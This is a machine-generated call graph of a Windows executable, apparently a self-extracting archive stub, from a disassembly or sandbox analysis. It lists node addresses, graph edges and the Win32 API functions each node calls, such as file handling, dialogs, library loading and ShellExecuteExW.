23686->23681 23687->23688 23689 6ad7d LoadLibraryExW 23687->23689 23688->23686 23690 6ada1 FreeLibrary 23688->23690 23689->23688 23690->23686 23691->23617 23692->23571 25356 6c030 GetProcessHeap 25358 5a440 GdipCloneImage GdipAlloc 25411 63a40 5 API calls CatchGuardHandler 25429 71f40 CloseHandle 25359 5e455 14 API calls ___delayLoadHelper2@8 24377 5cd58 24378 5cd7b 24377->24378 24380 5ce22 24377->24380 24378->24380 24384 51fbb CompareStringW 24378->24384 24390 5c793 _wcslen _wcsrchr 24380->24390 24405 5d78f 24380->24405 24382 5d40a 24384->24378 24385 5ca67 SetWindowTextW 24385->24390 24390->24382 24390->24385 24391 5c855 SetFileAttributesW 24390->24391 24396 5cc31 GetDlgItem SetWindowTextW SendMessageW 24390->24396 24399 5cc71 SendMessageW 24390->24399 24404 51fbb CompareStringW 24390->24404 24429 5b314 24390->24429 24433 5a64d GetCurrentDirectoryW 24390->24433 24435 4a5d1 6 API calls 24390->24435 24436 4a55a FindClose 24390->24436 24437 5b48e 76 API calls 2 library calls 24390->24437 24438 63e3e 24390->24438 24392 5c90f GetFileAttributesW 24391->24392 24403 5c86f __cftof _wcslen 24391->24403 24392->24390 24395 5c921 DeleteFileW 24392->24395 24395->24390 24397 5c932 24395->24397 24396->24390 24398 44092 _swprintf 51 API calls 24397->24398 24400 5c952 GetFileAttributesW 24398->24400 24399->24390 24400->24397 24401 5c967 MoveFileW 24400->24401 24401->24390 24402 5c97f MoveFileExW 24401->24402 24402->24390 24403->24390 24403->24392 24434 4b991 51 API calls 2 library calls 24403->24434 24404->24390 24407 5d799 __cftof _wcslen 24405->24407 24406 5d9e7 24406->24390 24407->24406 24408 5d9c0 24407->24408 24409 5d8a5 24407->24409 24454 51fbb CompareStringW 24407->24454 24408->24406 24413 5d9de ShowWindow 24408->24413 24451 4a231 24409->24451 24413->24406 24414 5d8d9 ShellExecuteExW 24414->24406 24420 5d8ec 24414->24420 24416 5d8d1 24416->24414 24417 5d925 24456 5dc3b 6 API calls 24417->24456 24418 5d97b CloseHandle 24419 5d989 24418->24419 24424 5d994 24418->24424 24457 51fbb CompareStringW 24419->24457 24420->24417 24420->24418 24423 5d91b ShowWindow 24420->24423 24423->24417 24424->24408 24425 5d93d 24425->24418 24426 5d950 GetExitCodeProcess 24425->24426 24426->24418 24427 5d963 24426->24427 24427->24418 24430 5b31e 24429->24430 24431 5b3f0 ExpandEnvironmentStringsW 24430->24431 24432 5b40d 24430->24432 24431->24432 24432->24390 24433->24390 24434->24403 24435->24390 24436->24390 24437->24390 24439 68e54 24438->24439 24440 68e61 24439->24440 24441 68e6c 24439->24441 24442 68e06 __vswprintf_c_l 21 API calls 24440->24442 24443 68e74 24441->24443 24449 68e7d __dosmaperr 24441->24449 24448 68e69 24442->24448 24444 68dcc _free 20 API calls 24443->24444 24444->24448 24445 68ea7 HeapReAlloc 24445->24448 24445->24449 24446 68e82 24466 691a8 20 API calls __dosmaperr 24446->24466 24448->24390 24449->24445 24449->24446 24467 67a5e 7 API calls 2 library calls 24449->24467 24458 4a243 24451->24458 24454->24409 24455 4b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24455->24416 24456->24425 24457->24424 24459 5ec50 24458->24459 24460 4a250 GetFileAttributesW 24459->24460 24461 4a261 24460->24461 24462 4a23a 24460->24462 24463 4bb03 GetCurrentDirectoryW 24461->24463 24462->24414 24462->24455 24464 4a275 24463->24464 24464->24462 24465 4a279 GetFileAttributesW 24464->24465 24465->24462 24466->24448 24467->24449 25431 67f6e 52 API calls 3 library calls 25413 68268 55 API calls _free 25360 5c793 107 API calls 4 library calls 25299 49a74 25303 49a7e 25299->25303 25300 49ab1 25301 49b9d SetFilePointer 25301->25300 25302 49bb6 GetLastError 25301->25302 25302->25300 25303->25300 25303->25301 25304 4981a 79 API calls 25303->25304 25305 49b79 25303->25305 25304->25305 25305->25301 25361 41075 84 API calls 25362 5a070 10 API calls 25414 5b270 99 API calls 25433 41f72 128 API calls __EH_prolog 25333 49f7a 25334 49f8f 25333->25334 25335 49f88 25333->25335 25336 49f9c GetStdHandle 25334->25336 25343 49fab 25334->25343 25336->25343 25337 4a003 WriteFile 25337->25343 25338 49fd4 WriteFile 25339 49fcf 25338->25339 25338->25343 25339->25338 25339->25343 25341 4a095 25345 46e98 77 API calls 25341->25345 25343->25335 25343->25337 25343->25338 25343->25339 25343->25341 25344 46baa 78 API calls 25343->25344 25344->25343 25345->25335 25415 5c793 102 API calls 4 library calls 25394 59580 6 API calls 25395 5b18d 78 API calls 25366 5c793 97 API calls 4 library calls 25368 6b49d 6 API calls CatchGuardHandler 25397 5eda7 48 API calls _unexpected 25369 5dca1 DialogBoxParamW 25435 5f3a0 27 API calls 25372 6a4a0 71 API calls _free 25373 708a0 IsProcessorFeaturePresent 25436 46faa 111 API calls 3 library calls 23430 5e5b1 23431 5e578 23430->23431 23433 5e85d 23431->23433 23459 5e5bb 23433->23459 23435 5e86d 23436 5e8ee 23435->23436 23437 5e8ca 23435->23437 23440 5e966 LoadLibraryExA 23436->23440 23441 5e9c7 23436->23441 23443 5ea95 23436->23443 23447 5e9d9 23436->23447 23438 5e7fb DloadReleaseSectionWriteAccess 6 API calls 23437->23438 23439 5e8d5 RaiseException 23438->23439 23454 5eac3 23439->23454 23440->23441 23442 5e979 GetLastError 23440->23442 23446 5e9d2 FreeLibrary 23441->23446 23441->23447 23444 5e9a2 23442->23444 23451 5e98c 23442->23451 23468 5e7fb 23443->23468 23448 5e7fb DloadReleaseSectionWriteAccess 6 API calls 23444->23448 23445 5ea37 GetProcAddress 23445->23443 23449 5ea47 GetLastError 23445->23449 23446->23447 23447->23443 23447->23445 23452 5e9ad RaiseException 23448->23452 23453 5ea5a 23449->23453 23451->23441 23451->23444 23452->23454 23453->23443 23455 5e7fb DloadReleaseSectionWriteAccess 6 API calls 23453->23455 23454->23431 23456 5ea7b RaiseException 23455->23456 23457 5e5bb ___delayLoadHelper2@8 6 API calls 23456->23457 23458 5ea92 23457->23458 23458->23443 23460 5e5c7 23459->23460 23461 5e5ed 23459->23461 23476 5e664 23460->23476 23461->23435 23463 5e5cc 23464 5e5e8 23463->23464 23479 5e78d 23463->23479 23484 5e5ee GetModuleHandleW GetProcAddress GetProcAddress 23464->23484 23467 5e836 23467->23435 23469 5e80d 23468->23469 23470 5e82f 23468->23470 23471 5e664 DloadReleaseSectionWriteAccess 3 API calls 23469->23471 23470->23454 23472 5e812 23471->23472 23473 5e82a 23472->23473 23474 5e78d DloadProtectSection 3 API calls 23472->23474 23487 5e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23473->23487 23474->23473 23485 5e5ee GetModuleHandleW GetProcAddress GetProcAddress 23476->23485 23478 5e669 23478->23463 23482 5e7a2 DloadProtectSection 23479->23482 23480 5e7a8 23480->23464 23481 5e7dd VirtualProtect 23481->23480 23482->23480 23482->23481 23486 5e6a3 VirtualQuery GetSystemInfo 23482->23486 23484->23467 23485->23478 23486->23481 23487->23470 25399 5b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23696 5f3b2 23697 5f3be __FrameHandler3::FrameUnwindToState 23696->23697 23728 5eed7 23697->23728 23699 5f3c5 23700 5f518 23699->23700 23703 5f3ef 23699->23703 23801 5f838 4 API calls 2 library calls 23700->23801 23702 5f51f 23794 67f58 23702->23794 23716 5f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23703->23716 23739 68aed 23703->23739 23710 5f40e 23712 5f48f 23747 5f953 GetStartupInfoW __cftof 23712->23747 23714 5f495 23748 68a3e 51 API calls 23714->23748 23716->23712 23797 67af4 38 API calls 2 library calls 23716->23797 23717 5f49d 23749 5df1e 23717->23749 23722 5f4b1 23722->23702 23723 5f4b5 23722->23723 23724 5f4be 23723->23724 23799 67efb 28 API calls _abort 23723->23799 23800 5f048 12 API calls ___scrt_uninitialize_crt 23724->23800 23727 5f4c6 23727->23710 23729 5eee0 23728->23729 23803 5f654 IsProcessorFeaturePresent 23729->23803 23731 5eeec 23804 62a5e 23731->23804 23733 5eef1 23734 5eef5 23733->23734 23812 68977 23733->23812 23734->23699 23737 5ef0c 23737->23699 23741 68b04 23739->23741 23740 5fbbc CatchGuardHandler 5 API calls 23742 5f408 23740->23742 23741->23740 23742->23710 23743 68a91 23742->23743 23744 68ac0 23743->23744 23745 5fbbc CatchGuardHandler 5 API calls 23744->23745 23746 68ae9 23745->23746 23746->23716 23747->23714 23748->23717 23912 50863 23749->23912 23753 5df3d 23961 5ac16 23753->23961 23755 5df46 __cftof 23756 5df59 GetCommandLineW 23755->23756 23757 5dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23756->23757 23758 5df68 23756->23758 23976 44092 23757->23976 23965 5c5c4 23758->23965 23764 5df76 OpenFileMappingW 23768 5dfd6 CloseHandle 23764->23768 23769 5df8f MapViewOfFile 23764->23769 23765 5dfe0 23970 5dbde 23765->23970 23768->23757 23771 5dfa0 __InternalCxxFrameHandler 23769->23771 23772 5dfcd UnmapViewOfFile 23769->23772 23775 5dbde 2 API calls 23771->23775 23772->23768 23778 5dfbc 23775->23778 23777 590b7 8 API calls 23779 5e0aa DialogBoxParamW 23777->23779 23778->23772 23780 5e0e4 23779->23780 23781 5e0f6 Sleep 23780->23781 23782 5e0fd 23780->23782 23781->23782 23784 5e10b 23782->23784 24009 5ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23782->24009 23785 5e12a DeleteObject 23784->23785 23786 5e146 23785->23786 23787 5e13f DeleteObject 23785->23787 23788 5e177 23786->23788 23789 5e189 23786->23789 23787->23786 24010 5dc3b 6 API calls 23788->24010 24006 5ac7c 23789->24006 23792 5e17d CloseHandle 23792->23789 23793 5e1c3 23798 5f993 GetModuleHandleW 23793->23798 24261 67cd5 23794->24261 23797->23712 23798->23722 23799->23724 23800->23727 23801->23702 23803->23731 23816 63b07 23804->23816 23808 62a6f 23809 62a7a 23808->23809 23830 63b43 DeleteCriticalSection 23808->23830 23809->23733 23811 62a67 23811->23733 23859 6c05a 23812->23859 23815 62a7d 7 API calls 2 library calls 23815->23734 23817 63b10 23816->23817 23819 63b39 23817->23819 23820 62a63 23817->23820 23831 63d46 23817->23831 23836 63b43 DeleteCriticalSection 23819->23836 23820->23811 23822 62b8c 23820->23822 23852 63c57 23822->23852 23826 62baf 23827 62bbc 23826->23827 23858 62bbf 6 API calls ___vcrt_FlsFree 23826->23858 23827->23808 23829 62ba1 23829->23808 23830->23811 23837 63c0d 23831->23837 23834 63d7e InitializeCriticalSectionAndSpinCount 23835 63d69 23834->23835 23835->23817 23836->23820 23838 63c26 23837->23838 23839 63c4f 23837->23839 23838->23839 23844 63b72 23838->23844 23839->23834 23839->23835 23842 63c3b GetProcAddress 23842->23839 23843 63c49 23842->23843 23843->23839 23849 63b7e ___vcrt_FlsSetValue 23844->23849 23845 63bf3 23845->23839 23845->23842 23846 63b95 LoadLibraryExW 23847 63bb3 GetLastError 23846->23847 23848 63bfa 23846->23848 23847->23849 23848->23845 23850 63c02 FreeLibrary 23848->23850 23849->23845 23849->23846 23851 63bd5 LoadLibraryExW 23849->23851 23850->23845 23851->23848 23851->23849 23853 63c0d ___vcrt_FlsSetValue 5 API calls 23852->23853 23854 63c71 23853->23854 23855 63c8a TlsAlloc 23854->23855 23856 62b96 23854->23856 23856->23829 23857 63d08 6 API calls ___vcrt_FlsSetValue 23856->23857 23857->23826 23858->23829 23862 6c077 23859->23862 23863 6c073 23859->23863 23860 5fbbc CatchGuardHandler 5 API calls 23861 5eefe 23860->23861 23861->23737 23861->23815 23862->23863 23865 6a6a0 23862->23865 23863->23860 23866 6a6ac __FrameHandler3::FrameUnwindToState 23865->23866 23877 6ac31 EnterCriticalSection 23866->23877 23868 6a6b3 23878 6c528 23868->23878 23870 6a6d1 23893 6a6ed LeaveCriticalSection _abort 23870->23893 23871 6a6c2 23871->23870 23891 6a529 29 API calls 23871->23891 23874 6a6e2 _abort 23874->23862 23875 6a6cc 23892 6a5df GetStdHandle GetFileType 23875->23892 23877->23868 23879 6c534 __FrameHandler3::FrameUnwindToState 23878->23879 23880 6c541 23879->23880 23881 6c558 23879->23881 23902 691a8 20 API calls __dosmaperr 23880->23902 23894 6ac31 EnterCriticalSection 23881->23894 23884 6c546 23903 69087 26 API calls ___std_exception_copy 23884->23903 23886 6c590 23904 6c5b7 LeaveCriticalSection _abort 23886->23904 23887 6c550 _abort 23887->23871 23888 6c564 23888->23886 23895 6c479 23888->23895 23891->23875 23892->23870 23893->23874 23894->23888 23896 6b136 __dosmaperr 20 API calls 23895->23896 23897 6c48b 23896->23897 23901 6c498 23897->23901 23905 6af0a 23897->23905 23898 68dcc _free 20 API calls 23899 6c4ea 23898->23899 23899->23888 23901->23898 23902->23884 23903->23887 23904->23887 23906 6ac98 __dosmaperr 5 API calls 23905->23906 23907 6af31 23906->23907 23908 6af4f InitializeCriticalSectionAndSpinCount 23907->23908 23909 6af3a 23907->23909 23908->23909 23910 5fbbc CatchGuardHandler 5 API calls 23909->23910 23911 6af66 23910->23911 23911->23897 24011 5ec50 23912->24011 23915 508e7 23917 50c14 GetModuleFileNameW 23915->23917 24022 675fb 42 API calls __vsnwprintf_l 23915->24022 23916 50888 GetProcAddress 23918 508a1 23916->23918 23919 508b9 GetProcAddress 23916->23919 23928 50c32 23917->23928 23918->23919 23921 508cb 23919->23921 23921->23915 23922 50b54 23922->23917 23923 50b5f GetModuleFileNameW CreateFileW 23922->23923 23924 50b8f SetFilePointer 23923->23924 23925 50c08 CloseHandle 23923->23925 23924->23925 23926 50b9d ReadFile 23924->23926 23925->23917 23926->23925 23930 50bbb 23926->23930 23931 50c94 GetFileAttributesW 23928->23931 23933 50c5d CompareStringW 23928->23933 23934 50cac 23928->23934 24013 4b146 23928->24013 24016 5081b 23928->24016 23930->23925 23932 5081b 2 API calls 23930->23932 23931->23928 23931->23934 23932->23930 23933->23928 23936 50cb7 23934->23936 23937 50cec 23934->23937 23935 50dfb 23960 5a64d GetCurrentDirectoryW 23935->23960 23938 50cd0 GetFileAttributesW 23936->23938 23939 50ce8 23936->23939 23937->23935 23940 4b146 GetVersionExW 23937->23940 23938->23936 23938->23939 23939->23937 23941 50d06 23940->23941 23942 50d73 23941->23942 23943 50d0d 23941->23943 23945 44092 _swprintf 51 API calls 23942->23945 23944 5081b 2 API calls 23943->23944 23946 50d17 23944->23946 23947 50d9b AllocConsole 23945->23947 23950 5081b 2 API calls 23946->23950 23948 50df3 ExitProcess 23947->23948 23949 50da8 GetCurrentProcessId AttachConsole 23947->23949 24027 63e13 23949->24027 23952 50d21 23950->23952 24023 4e617 23952->24023 23956 44092 _swprintf 51 API calls 23957 50d4f 23956->23957 23958 4e617 53 API calls 23957->23958 23959 50d5e 23958->23959 23959->23948 23960->23753 23962 5081b 2 API calls 23961->23962 23963 5ac2a OleInitialize 23962->23963 23964 5ac4d GdiplusStartup SHGetMalloc 23963->23964 23964->23755 23969 5c5ce 23965->23969 23966 5c6e4 23966->23764 23966->23765 23967 51fac CharUpperW 23967->23969 23969->23966 23969->23967 24052 4f3fa 82 API calls 2 library calls 23969->24052 23971 5ec50 23970->23971 23972 5dbeb SetEnvironmentVariableW 23971->23972 23974 5dc0e 23972->23974 23973 5dc36 23973->23757 23974->23973 23975 5dc2a SetEnvironmentVariableW 23974->23975 23975->23973 24053 44065 23976->24053 23979 5b6dd LoadBitmapW 23980 5b6fe 23979->23980 23981 5b70b GetObjectW 23979->23981 24087 5a6c2 FindResourceW 23980->24087 23985 5b71a 23981->23985 24082 5a5c6 23985->24082 23987 5b770 23998 4da42 23987->23998 23988 5b74c 24103 5a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23988->24103 23989 5a6c2 13 API calls 23991 5b73d 23989->23991 23991->23988 23993 5b743 DeleteObject 23991->23993 23992 5b754 24104 5a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23992->24104 23993->23988 23995 5b75d 24105 5a80c 8 API calls 23995->24105 23997 5b764 DeleteObject 23997->23987 24116 4da67 23998->24116 24003 590b7 24249 5eb38 24003->24249 24007 5acab GdiplusShutdown CoUninitialize 24006->24007 24007->23793 24009->23784 24010->23792 24012 5086d GetModuleHandleW 24011->24012 24012->23915 24012->23916 24014 4b15a GetVersionExW 24013->24014 24015 4b196 24013->24015 24014->24015 24015->23928 24017 5ec50 24016->24017 24018 50828 GetSystemDirectoryW 24017->24018 24019 50840 24018->24019 24020 5085e 24018->24020 24021 50851 LoadLibraryW 24019->24021 24020->23928 24021->24020 24022->23922 24024 4e627 24023->24024 24029 4e648 24024->24029 24028 50dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24027->24028 24028->23948 24035 4d9b0 24029->24035 24032 4e645 24032->23956 24033 4e66b LoadStringW 24033->24032 24034 4e682 LoadStringW 24033->24034 24034->24032 24040 4d8ec 24035->24040 24037 4d9cd 24038 4d9e2 24037->24038 24048 4d9f0 26 API calls 24037->24048 24038->24032 24038->24033 24041 4d904 24040->24041 24047 4d984 _strncpy 24040->24047 24042 4d928 24041->24042 24049 51da7 WideCharToMultiByte 24041->24049 24044 4d959 24042->24044 24050 4e5b1 50 API calls __vsnprintf 24042->24050 24051 66159 26 API calls 3 library calls 24044->24051 24047->24037 24048->24038 24049->24042 24050->24044 24051->24047 24052->23969 24054 4407c __vswprintf_c_l 24053->24054 24057 65fd4 24054->24057 24060 64097 24057->24060 24061 640d7 24060->24061 24062 640bf 24060->24062 24061->24062 24063 640df 24061->24063 24077 691a8 20 API calls __dosmaperr 24062->24077 24065 64636 __cftof 38 API calls 24063->24065 24067 640ef 24065->24067 24066 640c4 24078 69087 26 API calls ___std_exception_copy 24066->24078 24079 64601 20 API calls 2 library calls 24067->24079 24070 5fbbc CatchGuardHandler 5 API calls 24072 44086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24070->24072 24071 64167 24080 649e6 51 API calls 3 library calls 24071->24080 24072->23979 24075 64172 24081 646b9 20 API calls _free 24075->24081 24076 640cf 24076->24070 24077->24066 24078->24076 24079->24071 24080->24075 24081->24076 24106 5a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24082->24106 24084 5a5cd 24085 5a5d9 24084->24085 24107 5a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24084->24107 24085->23987 24085->23988 24085->23989 24088 5a6e5 SizeofResource 24087->24088 24089 5a7d3 24087->24089 24088->24089 24090 5a6fc LoadResource 24088->24090 24089->23981 24089->23985 24090->24089 24091 5a711 LockResource 24090->24091 24091->24089 24092 5a722 GlobalAlloc 24091->24092 24092->24089 24093 5a73d GlobalLock 24092->24093 24094 5a7cc GlobalFree 24093->24094 24095 5a74c __InternalCxxFrameHandler 24093->24095 24094->24089 24096 5a754 CreateStreamOnHGlobal 24095->24096 24097 5a7c5 GlobalUnlock 24096->24097 24098 5a76c 24096->24098 24097->24094 24108 5a626 GdipAlloc 24098->24108 24101 5a7b0 24101->24097 24102 5a79a GdipCreateHBITMAPFromBitmap 24102->24101 24103->23992 24104->23995 24105->23997 24106->24084 24107->24085 24109 5a645 24108->24109 24110 5a638 24108->24110 24109->24097 24109->24101 24109->24102 24112 5a3b9 24110->24112 24113 5a3e1 GdipCreateBitmapFromStream 24112->24113 24114 5a3da GdipCreateBitmapFromStreamICM 24112->24114 24115 5a3e6 24113->24115 24114->24115 24115->24109 24117 4da75 __EH_prolog 24116->24117 24118 4daa4 GetModuleFileNameW 24117->24118 24119 4dad5 24117->24119 24120 4dabe 24118->24120 24162 498e0 24119->24162 24120->24119 24122 4db31 24173 66310 24122->24173 24124 4e261 78 API calls 24127 4db05 24124->24127 24127->24122 24127->24124 24140 4dd4a 24127->24140 24128 4db44 24129 66310 26 API calls 24128->24129 24137 4db56 ___vcrt_FlsSetValue 24129->24137 24130 4dc85 24130->24140 24209 49d70 81 API calls 24130->24209 24134 4dc9f ___std_exception_copy 24135 49bd0 82 API calls 24134->24135 24134->24140 24138 4dcc8 ___std_exception_copy 24135->24138 24137->24130 24137->24140 24187 49e80 24137->24187 24203 49bd0 24137->24203 24208 49d70 81 API calls 24137->24208 24138->24140 24157 4dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 24138->24157 24210 51b84 MultiByteToWideChar 24138->24210 24196 4959a 24140->24196 24141 4e159 24148 4e1de 24141->24148 24216 68cce 26 API calls ___std_exception_copy 24141->24216 24144 4e16e 24217 67625 26 API calls ___std_exception_copy 24144->24217 24146 4e1c6 24218 4e27c 78 API calls 24146->24218 24147 4e214 24149 66310 26 API calls 24147->24149 24148->24147 24151 4e261 78 API calls 24148->24151 24152 4e22d 24149->24152 24151->24148 24153 66310 26 API calls 24152->24153 24153->24140 24156 51da7 WideCharToMultiByte 24156->24157 24157->24140 24157->24141 24157->24156 24211 4e5b1 50 API calls __vsnprintf 24157->24211 24212 66159 26 API calls 3 library calls 24157->24212 24213 68cce 26 API calls ___std_exception_copy 24157->24213 24214 67625 26 API calls ___std_exception_copy 24157->24214 24215 4e27c 78 API calls 24157->24215 24160 4e29e GetModuleHandleW FindResourceW 24161 4da55 24160->24161 24161->24003 24163 498ea 24162->24163 24164 4994b CreateFileW 24163->24164 24165 4996c GetLastError 24164->24165 24168 499bb 24164->24168 24219 4bb03 24165->24219 24167 4998c 24167->24168 24169 49990 CreateFileW GetLastError 24167->24169 24170 499ff 24168->24170 24172 499e5 SetFileTime 24168->24172 24169->24168 24171 499b5 24169->24171 24170->24127 24171->24168 24172->24170 24174 66349 24173->24174 24175 6634d 24174->24175 24186 66375 24174->24186 24223 691a8 20 API calls __dosmaperr 24175->24223 24177 66699 24179 5fbbc CatchGuardHandler 5 API calls 24177->24179 24178 66352 24224 69087 26 API calls ___std_exception_copy 24178->24224 24181 666a6 24179->24181 24181->24128 24182 6635d 24183 5fbbc CatchGuardHandler 5 API calls 24182->24183 24185 66369 24183->24185 24185->24128 24186->24177 24225 66230 5 API calls CatchGuardHandler 24186->24225 24188 49e92 24187->24188 24192 49ea5 24187->24192 24191 49eb0 24188->24191 24226 46d5b 77 API calls 24188->24226 24190 49eb8 SetFilePointer 24190->24191 24193 49ed4 GetLastError 24190->24193 24191->24137 24192->24190 24192->24191 24193->24191 24194 49ede 24193->24194 24194->24191 24227 46d5b 77 API calls 24194->24227 24197 495be 24196->24197 24202 495cf 24196->24202 24198 495d1 24197->24198 24199 495ca 24197->24199 24197->24202 24233 49620 24198->24233 24228 4974e 24199->24228 24202->24160 24204 49be3 24203->24204 24205 49bdc 24203->24205 24204->24205 24207 49785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24204->24207 24248 46d1a 77 API calls 24204->24248 24205->24137 24207->24204 24208->24137 24209->24134 24210->24157 24211->24157 24212->24157 24213->24157 24214->24157 24215->24157 24216->24144 24217->24146 24218->24148 24220 4bb10 _wcslen 24219->24220 24221 4bbb8 GetCurrentDirectoryW 24220->24221 24222 4bb39 _wcslen 24220->24222 24221->24222 24222->24167 24223->24178 24224->24182 24225->24186 24226->24192 24227->24191 24229 49757 24228->24229 24230 49781 24228->24230 24229->24230 24239 4a1e0 24229->24239 24230->24202 24234 4962c 24233->24234 24235 4964a 24233->24235 24234->24235 24237 49638 CloseHandle 24234->24237 24236 49669 24235->24236 24247 46bd5 76 API calls 24235->24247 24236->24202 24237->24235 24240 5ec50 24239->24240 24241 4a1ed DeleteFileW 24240->24241 24242 4a200 24241->24242 24243 4977f 24241->24243 24244 4bb03 GetCurrentDirectoryW 24242->24244 24243->24202 24245 4a214 24244->24245 24245->24243 24246 4a218 DeleteFileW 24245->24246 24246->24243 24247->24236 24248->24204 24251 5eb3d ___std_exception_copy 24249->24251 24250 590d6 24250->23777 24251->24250 24254 5eb59 24251->24254 24258 67a5e 7 API calls 2 library calls 24251->24258 24253 5f5c9 24260 6238d RaiseException 24253->24260 24254->24253 24259 6238d RaiseException 24254->24259 24257 5f5e6 24258->24251 24259->24253 24260->24257 24262 67ce1 _abort 24261->24262 24263 67cfa 24262->24263 24264 67ce8 24262->24264 24285 6ac31 EnterCriticalSection 24263->24285 24297 67e2f GetModuleHandleW 24264->24297 24267 67ced 24267->24263 24298 67e73 GetModuleHandleExW 24267->24298 24268 67d9f 24286 67ddf 24268->24286 24272 67d76 24276 67d8e 24272->24276 24281 68a91 _abort 5 API calls 24272->24281 24274 67dbc 24289 67dee 24274->24289 24275 67de8 24307 72390 5 API calls CatchGuardHandler 24275->24307 24282 68a91 _abort 5 API calls 24276->24282 24277 67d01 24277->24268 24277->24272 24306 687e0 20 API calls _abort 24277->24306 24281->24276 24282->24268 24285->24277 24308 6ac81 LeaveCriticalSection 24286->24308 24288 67db8 24288->24274 24288->24275 24309 6b076 24289->24309 24292 67e1c 24295 67e73 _abort 8 API calls 24292->24295 24293 67dfc GetPEB 24293->24292 24294 67e0c GetCurrentProcess TerminateProcess 24293->24294 24294->24292 24296 67e24 ExitProcess 24295->24296 24297->24267 24299 67ec0 24298->24299 24300 67e9d GetProcAddress 24298->24300 24301 67ec6 FreeLibrary 24299->24301 24302 67ecf 24299->24302 24304 67eb2 24300->24304 24301->24302 24303 5fbbc CatchGuardHandler 5 API calls 24302->24303 24305 67cf9 24303->24305 24304->24299 24305->24263 24306->24272 24308->24288 24310 6b091 24309->24310 24311 6b09b 24309->24311 24313 5fbbc CatchGuardHandler 5 API calls 24310->24313 24312 6ac98 __dosmaperr 5 API calls 24311->24312 24312->24310 24314 67df8 24313->24314 24314->24292 24314->24293 25438 51bbd GetCPInfo IsDBCSLeadByte 25401 5b5c0 100 API calls 25439 577c0 118 API calls 25440 5ffc0 RaiseException _com_error::_com_error CallUnexpected 24323 5dec2 24324 5decf 24323->24324 24325 4e617 53 API calls 24324->24325 24326 5dedc 24325->24326 24327 44092 _swprintf 51 API calls 24326->24327 24328 5def1 SetDlgItemTextW 24327->24328 24331 5b568 PeekMessageW 24328->24331 24332 5b583 GetMessageW 24331->24332 24333 5b5bc 24331->24333 24334 5b599 IsDialogMessageW 24332->24334 24335 5b5a8 TranslateMessage DispatchMessageW 24332->24335 24334->24333 24334->24335 24335->24333 25417 562ca 123 API calls __InternalCxxFrameHandler 24341 410d5 24346 45abd 24341->24346 24347 45ac7 __EH_prolog 24346->24347 24353 4b505 24347->24353 24349 45ad3 24359 45cac GetCurrentProcess GetProcessAffinityMask 24349->24359 24354 4b50f __EH_prolog 24353->24354 24360 4f1d0 82 API calls 24354->24360 24356 4b521 24361 4b61e 24356->24361 24360->24356 24362 4b630 __cftof 24361->24362 24365 510dc 24362->24365 24368 5109e GetCurrentProcess GetProcessAffinityMask 24365->24368 24369 4b597 24368->24369 24369->24349 24370 5e2d7 24371 5e1db 24370->24371 24372 5e85d ___delayLoadHelper2@8 14 API calls 24371->24372 24372->24371 24373 5e1d1 14 API calls ___delayLoadHelper2@8 25376 5f4d3 20 API calls 25442 6a3d0 21 API calls 2 library calls 25443 72bd0 VariantClear 25419 60ada 51 API calls 2 library calls 24469 5eae7 24470 5eaf1 24469->24470 24471 5e85d ___delayLoadHelper2@8 14 API calls 24470->24471 24472 5eafe 24471->24472 25377 5f4e7 29 API calls _abort 24473 5b7e0 24474 5b7ea __EH_prolog 24473->24474 24641 41316 24474->24641 24477 5b841 24478 5bf0f 24706 5d69e 24478->24706 24479 5b82a 24479->24477 24481 5b838 24479->24481 24482 5b89b 24479->24482 24485 5b83c 24481->24485 24486 5b878 24481->24486 24484 5b92e GetDlgItemTextW 24482->24484 24492 5b8b1 24482->24492 24484->24486 24491 5b96b 24484->24491 24485->24477 24493 4e617 53 API calls 24485->24493 24486->24477 24495 5b95f KiUserCallbackDispatcher 24486->24495 24487 5bf38 24489 5bf41 SendDlgItemMessageW 24487->24489 24490 5bf52 GetDlgItem SendMessageW 24487->24490 24488 5bf2a SendMessageW 24488->24487 24489->24490 24724 5a64d GetCurrentDirectoryW 24490->24724 24496 5b980 GetDlgItem 24491->24496 24639 5b974 24491->24639 24497 4e617 53 API calls 24492->24497 24498 5b85b 24493->24498 24495->24477 24500 5b994 SendMessageW SendMessageW 24496->24500 24501 5b9b7 SetFocus 24496->24501 24502 5b8ce SetDlgItemTextW 24497->24502 24746 4124f SHGetMalloc 24498->24746 24499 5bf82 GetDlgItem 24504 5bfa5 SetWindowTextW 24499->24504 24505 5bf9f 24499->24505 24500->24501 24506 5b9c7 24501->24506 24518 5b9e0 24501->24518 24507 5b8d9 24502->24507 24725 5abab GetClassNameW 24504->24725 24505->24504 24511 4e617 53 API calls 24506->24511 24507->24477 24514 5b8e6 GetMessageW 24507->24514 24508 5b862 24508->24477 24517 5c1fc SetDlgItemTextW 24508->24517 24509 5be55 24512 4e617 53 API calls 24509->24512 24515 5b9d1 24511->24515 24519 5be65 SetDlgItemTextW 24512->24519 24514->24477 24521 5b8fd IsDialogMessageW 24514->24521 24747 5d4d4 24515->24747 24517->24477 24525 4e617 53 API calls 24518->24525 24524 5be79 24519->24524 24521->24507 24522 5b90c TranslateMessage DispatchMessageW 24521->24522 24522->24507 24523 5b9d9 24651 4a0b1 24523->24651 24527 4e617 53 API calls 24524->24527 24526 5ba17 24525->24526 24532 44092 _swprintf 51 API calls 24526->24532 24560 5be9c _wcslen 24527->24560 24530 5c020 24540 5c73f 97 API calls 24530->24540 24579 5c0d8 24530->24579 24531 5bff0 24531->24530 24535 4e617 53 API calls 24531->24535 24536 5ba29 24532->24536 24533 5c73f 97 API calls 24533->24531 24539 5c003 SetDlgItemTextW 24535->24539 24542 5d4d4 16 API calls 24536->24542 24537 5ba68 GetLastError 24538 5ba73 24537->24538 24657 5ac04 SetCurrentDirectoryW 24538->24657 24543 4e617 53 API calls 